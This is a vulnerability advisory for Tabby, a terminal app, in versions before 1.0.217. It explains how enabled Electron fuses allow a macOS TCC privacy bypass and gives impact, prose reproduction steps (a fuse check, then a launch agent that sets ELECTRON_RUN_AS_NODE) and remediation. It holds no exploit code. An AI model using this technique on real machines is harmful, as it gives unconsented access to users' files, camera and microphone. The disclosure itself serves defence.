Tabby TCC Bypass Vulnerability via Misconfigured Electron Fuses

A TCC (Transparency, Consent, and Control) bypass vulnerability has been identified in Tabby (formerly Terminus) versions prior to 1.0.217. This issue arises from the application enabling several high-risk Electron fuses, including RunAsNode, EnableNodeCliInspectArguments, and EnableNodeOptionsEnvironmentVariable. These fuses create potential code injection vectors, allowing attackers to bypass macOS privacy protections and access sensitive resources such as personal folders, the camera, and microphone. This vulnerability is particularly concerning given Tabby's extensive TCC permissions and user base.

Impact

Exploitation of this vulnerability allows for a TCC bypass, enabling access to TCC-protected resources such as personal folders, the camera, and microphone, without user consent. Injected code can be executed within the Node.js context, inheriting all privileges granted to Tabby, while circumventing macOS's security controls. This creates a privacy breach and potential for unauthorized surveillance.

Reproduction

To reproduce this vulnerability, download Tabby and inspect its code signing information and entitlements using the 'codesign' utility. After confirming the application has the Hardened Runtime enabled and lacks dangerous entitlements, use 'sudo npx @electron/fuses read --app /Applications/Tabby.app' to verify that risky fuses are enabled. Then, create a test program that attempts to access the 'Documents' folder, which is protected by TCC. Compile and execute the program directly through Terminal to demonstrate the TCC restrictions. Finally, create a launch agent configuration that loads Tabby with the 'ELECTRON_RUN_AS_NODE' environment variable set to 'true', allowing the program to bypass TCC protections and access the Documents folder.

Remediation

Users are advised to update Tabby to version 1.0.217 or later, and to disable the risky Electron fuses while maintaining the application's core functionality.